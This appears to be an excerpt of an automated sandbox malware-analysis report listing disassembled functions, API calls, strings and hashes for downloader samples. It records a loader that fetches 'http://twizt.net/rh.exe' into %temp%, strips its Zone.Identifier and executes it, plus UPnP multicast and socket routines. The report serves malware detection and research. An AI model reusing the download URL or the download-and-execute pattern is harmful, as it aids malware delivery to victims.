Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA

Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Recv$ErrorLastSleep
String ID:
API String ID: 3668019968-0
Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6

Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
WSAGetLastError.WS2_32 ref: 00401B12
Sleep.KERNEL32(00000001), ref: 00401B28
WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Send$ErrorLastSleep
String ID:
API String ID: 2121970615-0
Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A

Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CriticalSection$Leave$EnterExchangeInterlocked
String ID:
API String ID: 2223660684-0
Opcode ID: 7e6606f5c14d1b9ede2abea3a5762152510b51c5bdf13f408023d0105cc90a62
Instruction ID: 0184f799374b3cbd514a588550e5351e3808897b1395f0a2de410330185c2ead
Opcode Fuzzy Hash: 7e6606f5c14d1b9ede2abea3a5762152510b51c5bdf13f408023d0105cc90a62
Instruction Fuzzy Hash: DF01F7352423009FC3209F26EC44ADB77E8AF49711F04443EE80697650EB34E545DB28

Function 00406FE0 Relevance: 6.0, APIs: 4, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,?,?,00407A2A), ref: 00406FE8
SysAllocString.OLEAUT32(00416268), ref: 00406FF3
CoUninitialize.OLE32 ref: 00407018

Part of subcall function 00407030: SysFreeString.OLEAUT32(00000000), ref: 00407248

SysFreeString.OLEAUT32(00000000), ref: 00407012

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: String$Free$AllocInitializeUninitialize
String ID:
API String ID: 459949847-0
Opcode ID: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
Instruction ID: 74c6c169e6652ce6f6b7715e91ddbb7e77275cafe0f94b55a583b47f3cb3299b
Opcode Fuzzy Hash: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
Instruction Fuzzy Hash: 13E01275D44208FBD704AFA0DD0EB9D77789B05341F1081A5F905922A0DAF95E80DB56

Function 00407030 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

APIs

Part of subcall function 004072C0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0

SysFreeString.OLEAUT32(00000000), ref: 00407248

Strings

Microsoft Corporation, xrefs: 004071B6

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CreateFreeInstanceString
String ID: Microsoft Corporation
API String ID: 586785272-3838278685
Opcode ID: 2f3cc9baeef0c7a1245b843303fd4ce0e44c974243be678b414a87c4b8a79f3c
Instruction ID: 457fc6c08a50d419230b37d5b6ce52bdab008108e04107557a49afcd29d8ec7c
Opcode Fuzzy Hash: 2f3cc9baeef0c7a1245b843303fd4ce0e44c974243be678b414a87c4b8a79f3c
Instruction Fuzzy Hash: 4491FC75E0410ADFCB04DB94D890AAFB7B5BF48304F2081A9E515B73E4D734AE82CB66

Function 0040D980 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 0040DBC0: memset.NTDLL ref: 0040DBE8
Part of subcall function 0040DBC0: InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
Part of subcall function 0040DBC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
Part of subcall function 0040DBC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
Part of subcall function 0040DBC0: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
Part of subcall function 0040DBC0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
Part of subcall function 0040DBC0: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
Part of subcall function 0040DBC0: InternetCloseHandle.WININET(00000000), ref: 0040DDB7

Part of subcall function 0040DAB0: SysAllocString.OLEAUT32(00000000), ref: 0040DADE
Part of subcall function 0040DAB0: CoCreateInstance.OLE32(00412408,00000000,00004401,004123F8,00000000), ref: 0040DB06
Part of subcall function 0040DAB0: SysFreeString.OLEAUT32(00000000), ref: 0040DBA1

SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
SysFreeString.OLEAUT32(00000000), ref: 0040DA65

Strings

%S%S, xrefs: 0040DA46

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
String ID: %S%S
API String ID: 1017111014-3267608656
Opcode ID: 2a44cf61d891e8738e9fac40afdb9ff2254c365f5810798eb153ce2e68fa7b5b
Instruction ID: beec9ad9f3848cf7af9d47610756df11a49d132dd1bd9a4578eda8885410465d
Opcode Fuzzy Hash: 2a44cf61d891e8738e9fac40afdb9ff2254c365f5810798eb153ce2e68fa7b5b
Instruction Fuzzy Hash: 4941E6B5E002099FCB04DBE4C885AEFB7B9BF48304F148569E505B7391D738AA85CFA5

Function 0040D640 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407A25), ref: 0040D64A

Part of subcall function 0040D710: socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
Part of subcall function 0040D710: htons.WS2_32(0000076C), ref: 0040D760
Part of subcall function 0040D710: inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
Part of subcall function 0040D710: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
Part of subcall function 0040D710: bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
Part of subcall function 0040D710: lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
Part of subcall function 0040D710: sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
Part of subcall function 0040D710: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805

Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA65

Strings

TCP, xrefs: 0040D6BB
UDP, xrefs: 0040D6D8

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
String ID: TCP$UDP
API String ID: 1519345861-1097902612
Opcode ID: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
Instruction ID: b9d850b43d5b9198a526a111fa4c70c7537d99c61ef063864e94ee7d89292dcb
Opcode Fuzzy Hash: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
Instruction Fuzzy Hash: A91181B4D01208EBDB00EBD4D945FEE7374AB44308F1089BAE505772C2D7799E58CB9A

Function 0040D250 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
CloseHandle.KERNEL32(?), ref: 0040D2A9

Strings

.ou, xrefs: 0040D2A9

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CloseHandleObjectSingleWait
String ID: .ou
API String ID: 528846559-3683031111
Opcode ID: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
Instruction ID: d1fe1851c25795fdacbee2e877de448503af208f5fff4c31293181607202da8f
Opcode Fuzzy Hash: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
Instruction Fuzzy Hash: 3B11C574A04208EFCB04CF84D580E69B7B6FB89354F2081AAEC05AB385C735EE52DB95

Function 00405EB0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00415E30,?,?,?), ref: 00405EBF
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405EFE
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F73
LeaveCriticalSection.KERNEL32(00415E30), ref: 00405F90

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CriticalSectionmemcpy$EnterLeave
String ID:
API String ID: 469056452-0
Opcode ID: 11a0381e7cc2a19f3e704b5167a0aa4c73886e0f3014e3589bcc626491d58d19
Instruction ID: 4abcbf5e8f17672ba879e37304839ab4c0f114d9c1813139277d8bca2654c775
Opcode Fuzzy Hash: 11a0381e7cc2a19f3e704b5167a0aa4c73886e0f3014e3589bcc626491d58d19
Instruction Fuzzy Hash: 71217C35D04609EBCB04DF94D985BDEBBB1EB48304F1481AAE80567281D37CAA95CF9A

Analysis Process: 1171111125.exePID: 8016, Parent PID: 7744COMMON

Execution Graph

Execution Coverage:	36%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	85
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 005510B0 Relevance: 40.4, APIs: 19, Strings: 4, Instructions: 129
networkfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 005510B9
srand.MSVCR90 ref: 005510C0
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 005510E0
strlen.MSVCR90 ref: 005510EA
mbstowcs.MSVCR90 ref: 00551101
rand.MSVCR90 ref: 00551109
rand.MSVCR90 ref: 0055111D
wsprintfW.USER32 ref: 00551144
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0055115A
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00551189
CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 005511B8
InternetReadFile.WININET(00000000,?,00000103,?), ref: 005511EB
WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 0055121C
CloseHandle.KERNEL32(000000FF), ref: 0055122B
wsprintfW.USER32 ref: 00551244
DeleteFileW.KERNELBASE(?), ref: 00551254
CloseHandle.KERNEL32(000000FF), ref: 00551270
InternetCloseHandle.WININET(00000000), ref: 0055127D
InternetCloseHandle.WININET(00000000), ref: 0055128A

Strings

%s:Zone.Identifier, xrefs: 00551238
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36, xrefs: 00551155
%s\%d%d.exe, xrefs: 00551138
%temp%, xrefs: 005510DB

Memory Dump Source

Source File: 00000008.00000002.1602294064.0000000000551000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00550000, based on PE: true

Associated: 00000008.00000002.1602264203.0000000000550000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1602367753.0000000000552000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1602382078.0000000000554000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_550000_1171111125.jbxd

Similarity

API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
API String ID: 770025858-111153409
Opcode ID: 9d8f2fddd8e9112f9b311f9b778e9278909308d22967104a3878eaa4e1e00838
Instruction ID: d56daf293e68610f541c3180ac47196ca70eadc169d58bd5c01ec9b44ffddba5
Opcode Fuzzy Hash: 9d8f2fddd8e9112f9b311f9b778e9278909308d22967104a3878eaa4e1e00838
Instruction Fuzzy Hash: D341F8B1D01714ABEB24DB60CC5DFDA7B79BB98702F0044D5F609A21D0DA74AA88CF54

Function 00551000 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCR90 ref: 0055100E
memset.MSVCR90 ref: 0055101E
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00551057
Sleep.KERNELBASE(000003E8), ref: 00551067
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00551082
Sleep.KERNEL32(000003E8), ref: 0055109C

Strings

, xrefs: 00551091
open, xrefs: 0055107B
D, xrefs: 00551026

Memory Dump Source

Source File: 00000008.00000002.1602294064.0000000000551000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00550000, based on PE: true

Associated: 00000008.00000002.1602264203.0000000000550000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1602367753.0000000000552000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1602382078.0000000000554000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_550000_1171111125.jbxd

Similarity

API ID: Sleepmemset$CreateExecuteProcessShell
String ID: $D$open
API String ID: 3787208655-2182757814
Opcode ID: 32668efbcaa30f72ea0185bf1ff4bcac33d4c19ddd1404d3ef35bdb83fa66ad6
Instruction ID: b329049176fbbe217f6efeb03f31edf77a172dd0531bef8eb06906e73ce915a9
Opcode Fuzzy Hash: 32668efbcaa30f72ea0185bf1ff4bcac33d4c19ddd1404d3ef35bdb83fa66ad6
Instruction Fuzzy Hash: 22115471A41308BBEB10DF90CC5AFDE7B74BB55B02F100115FB056E1D0D6B1AA48DB59

Function 005512A0 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 41
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 005512BA
wsprintfW.USER32 ref: 005512D3
PathFileExistsW.KERNELBASE(?), ref: 005512E3
CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00551309
CloseHandle.KERNELBASE(000000FF), ref: 00551325

Strings

%temp%, xrefs: 005512B5
%s\g76876868687587f.txt, xrefs: 005512C7
^Gv, xrefs: 005512E3

Memory Dump Source

Source File: 00000008.00000002.1602294064.0000000000551000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00550000, based on PE: true

Associated: 00000008.00000002.1602264203.0000000000550000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1602367753.0000000000552000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1602382078.0000000000554000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_550000_1171111125.jbxd

Similarity

API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
String ID: %s\g76876868687587f.txt$%temp%$^Gv
API String ID: 750032643-811463184
Opcode ID: b4dd09e9e522750148d7d95dbd908b3c07775cad694d498fd279456ca2e8789b
Instruction ID: f8aebddfdefe786f7c56b6f6e406f02212d43feb359ce222c878a6c1844b4743
Opcode Fuzzy Hash: b4dd09e9e522750148d7d95dbd908b3c07775cad694d498fd279456ca2e8789b
Instruction Fuzzy Hash: 9901F7B890030CABD7209B60DC5EFE57B38BB05702F008595AB15950E1D6705ACCDFA5

Function 00551340 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 20
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00551348

Part of subcall function 005512A0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 005512BA
Part of subcall function 005512A0: wsprintfW.USER32 ref: 005512D3
Part of subcall function 005512A0: PathFileExistsW.KERNELBASE(?), ref: 005512E3

GetTickCount.KERNEL32 ref: 0055135A
srand.MSVCR90 ref: 00551361
Sleep.KERNELBASE(000E30D0), ref: 0055136E

Part of subcall function 005510B0: GetTickCount.KERNEL32 ref: 005510B9
Part of subcall function 005510B0: srand.MSVCR90 ref: 005510C0
Part of subcall function 005510B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 005510E0
Part of subcall function 005510B0: strlen.MSVCR90 ref: 005510EA
Part of subcall function 005510B0: mbstowcs.MSVCR90 ref: 00551101
Part of subcall function 005510B0: rand.MSVCR90 ref: 00551109
Part of subcall function 005510B0: rand.MSVCR90 ref: 0055111D
Part of subcall function 005510B0: wsprintfW.USER32 ref: 00551144
Part of subcall function 005510B0: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0055115A
Part of subcall function 005510B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00551189
Part of subcall function 005510B0: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 005511B8
Part of subcall function 005510B0: InternetReadFile.WININET(00000000,?,00000103,?), ref: 005511EB
Part of subcall function 005510B0: WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 0055121C

Strings

http://twizt.net/rh.exe, xrefs: 00551374

Memory Dump Source

Source File: 00000008.00000002.1602294064.0000000000551000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00550000, based on PE: true

Associated: 00000008.00000002.1602264203.0000000000550000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1602367753.0000000000552000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1602382078.0000000000554000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_550000_1171111125.jbxd

Similarity

API ID: File$Internet$CountEnvironmentExpandOpenSleepStringsTickrandsrandwsprintf$CreateExistsPathReadWritembstowcsstrlen
String ID: http://twizt.net/rh.exe
API String ID: 2330660114-139602931
Opcode ID: 8a96303cb2835c4e79c77334f26333b47456378293339849837e527b495da44f
Instruction ID: 81014e7116870a1368b7abd83ac44c629d50a7197099ffa18a256ef4bfd1a1ef
Opcode Fuzzy Hash: 8a96303cb2835c4e79c77334f26333b47456378293339849837e527b495da44f
Instruction Fuzzy Hash: 53D08C7691120127920033E26C3E71B3E687B61793F400422B905D04E2ED40900CA3AB

Analysis Process: 2779421088.exePID: 8088, Parent PID: 8016COMMON

Executed Functions

Function 00F73A48 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00F73B57,00F743DB,?,00000000,00000000,00000000,?,00F73CD0,00000022,FlsSetValue,00FB4078,00FB4080,00000000), ref: 00F73B09

Strings

ext-ms-, xrefs: 00F73AB3
api-ms-, xrefs: 00F73A9F

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 7eaccc2e1fb20d8fbbe85f012629e017b7e82d6ff0e7f6180ce5be61001556e4
Instruction ID: 6e2e5cb6ccb0f226088ad385a0491db3239f3e829f11b6ecb0b981aeb62c5036
Opcode Fuzzy Hash: 7eaccc2e1fb20d8fbbe85f012629e017b7e82d6ff0e7f6180ce5be61001556e4
Instruction Fuzzy Hash: 60212B35F04215BBD7219B24DC82AAA7768DB41770F154212ED4AB7290DB78EE00FBD2

Function 00F6BEFA Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 86
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00F6BF03
HeapAlloc.KERNEL32(00000000,00000008,00040000), ref: 00F6BF56

Part of subcall function 00F6BFEB: HeapAlloc.KERNEL32(?,00000008,00000010,?,00F6BF7F,?,00F6BC80,00000000), ref: 00F6BFF6

HeapFree.KERNEL32(00000000,00000000,?), ref: 00F6BFA2
VirtualFree.KERNELBASE(00000100,00000000,00008000), ref: 00F6BFCE
HeapFree.KERNEL32(00000000,00000000,00FBB188), ref: 00F6BFD4

Strings

@vTyueNpvINw-5eXXzoHaGMEix7w2VuIQqHtVQw7HCBpD3mLxOoAZKX7ugM3fwt2HzPvhq1atw2GpKhcT8dvXOe|idUmje-sVhkfaEMVfuTcflxHDoSLl|aBjLiweN-yx1OqUC|nReX4WqAX53TGPylOAjV2g0JjHNKTOhfuMne7eSn8ymLWnYb55M|chAaG|Tu|jWOsu|kAsKsaj640DOd9CBO9ppLr8uZUOSa0iay9KREERTTJOZG014|GTHpX9WBV, xrefs: 00F6BF36

Memory Dump Source

Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd

Similarity

API ID: Heap$Free$Alloc$ProcessVirtual
String ID: @vTyueNpvINw-5eXXzoHaGMEix7w2VuIQqHtVQw7HCBpD3mLxOoAZKX7ugM3fwt2HzPvhq1atw2GpKhcT8dvXOe|idUmje-sVhkfaEMVfuTcflxHDoSLl|aBjLiweN-yx1OqUC|nReX4WqAX53TGPylOAjV2g0JjHNKTOhfuMne7eSn8ymLWnYb55M|chAaG|Tu|jWOsu|kAsKsaj640DOd9CBO9ppLr8uZUOSa0iay9KREERTTJOZG014|GTHpX9WBV
API String ID: 3808331028-205222976
Opcode ID: da68225fcfec134c8fd8d9451ae00da1071b16a447f748c41a2506d294de805f
Instruction ID: ec3a6ce83d7b5b6f1c222eb7c451ab4878e2dc316d98997876815b5d89a9dba0
